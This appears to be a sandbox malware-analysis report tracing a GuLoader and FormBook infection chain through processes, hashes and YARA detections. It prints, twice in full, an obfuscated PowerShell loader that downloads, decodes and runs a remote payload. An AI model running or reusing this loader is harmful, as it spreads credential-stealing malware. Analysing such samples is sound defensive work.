AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;"
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:13:57:37
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:13:57:39
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
                                                Imagebase:0x7ff70be40000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:13:57:47
                                                Start date:01/06/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;"
                                                Imagebase:0x2b0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1660236750.00000000086F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.1660374596.0000000009B07000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1653655863.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:13:57:48
                                                Start date:01/06/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
                                                Imagebase:0x410000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:15:29:08
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x210000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:18
                                                Start time:15:29:09
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x210000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.1843095733.00000000036C7000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:21
                                                Start time:15:29:30
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe"
                                                Imagebase:0x200000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                Target ID:22
                                                Start time:15:29:32
                                                Start date:01/06/2024
                                                Path:C:\Windows\SysWOW64\clip.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\clip.exe"
                                                Imagebase:0x190000
                                                File size:24'576 bytes
                                                MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:25
                                                Start time:15:29:45
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe"
                                                Imagebase:0x200000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                Target ID:26
                                                Start time:15:29:52
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x210000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:27
                                                Start time:15:29:53
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\rundll32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                Imagebase:0x7ff7541c0000
                                                File size:71'680 bytes
                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:29
                                                Start time:15:29:58
                                                Start date:01/06/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff722870000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:30
                                                Start time:15:30:00
                                                Start date:01/06/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x210000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Reset < >
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e425906d0156f2dcee79c97e039953e10e4884e86daae29192a6507b26a9fbc5
                                                  • Instruction ID: 744a43f38cf7dc83541d3c8e2bb05930a72a8ee658c6d5542cec24ab0b6c8adb
                                                  • Opcode Fuzzy Hash: e425906d0156f2dcee79c97e039953e10e4884e86daae29192a6507b26a9fbc5
                                                  • Instruction Fuzzy Hash: A9F1C570908A4E8FEBA9DF28D845BE937D1FF55310F04826EE84DC7291DB38D9558B82
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee0223f75ab977c1a63da33542bd2dab1ae2bb270fbe697f1ec5f12d4ab23e8a
                                                  • Instruction ID: 9c2f8823ef3a14ccd4adfa5981f820055bd09cb035b161c9d718e442c99fd314
                                                  • Opcode Fuzzy Hash: ee0223f75ab977c1a63da33542bd2dab1ae2bb270fbe697f1ec5f12d4ab23e8a
                                                  • Instruction Fuzzy Hash: 10E1C130908A4E8FFBA9DF28C855BE977E1FB55310F04826AE84DC7292CE78D8548781
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1918875732.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaacda0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -
                                                  • API String ID: 0-2547889144
                                                  • Opcode ID: 310d15767f40afdf0bdc3257860b2adfe34f0c8a7b25a1e6085d1aaefe2fefb9
                                                  • Instruction ID: bf663a07f43ce404c9d69d5811fe716a52327a0f8abb810fda1191053d4854c3
                                                  • Opcode Fuzzy Hash: 310d15767f40afdf0bdc3257860b2adfe34f0c8a7b25a1e6085d1aaefe2fefb9
                                                  • Instruction Fuzzy Hash: 25122762A0EBC68FF7969B2888655B57FE0EF57620B1841FBD09DC71D3DE18D8098381
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1918875732.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaacda0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ad0db55bbb2a1d3b5c9d7ccd0ade8bcdfab283e39414e8ac378f6ee3111a695
                                                  • Instruction ID: ad7333f45e0c9a8e41f5dace8f4b32768b3bee19ef6789dcd4d54ad399974713
                                                  • Opcode Fuzzy Hash: 8ad0db55bbb2a1d3b5c9d7ccd0ade8bcdfab283e39414e8ac378f6ee3111a695
                                                  • Instruction Fuzzy Hash: 94B12AA2A0EF898FFB559B2848545B97BE1EF56620B4805FFD05DC71D3EE18DC088381
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.1917776699.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba3e296f9e4fc9d3af6739ea4d829e10b7570a386eaefa58d89823000cec81f8
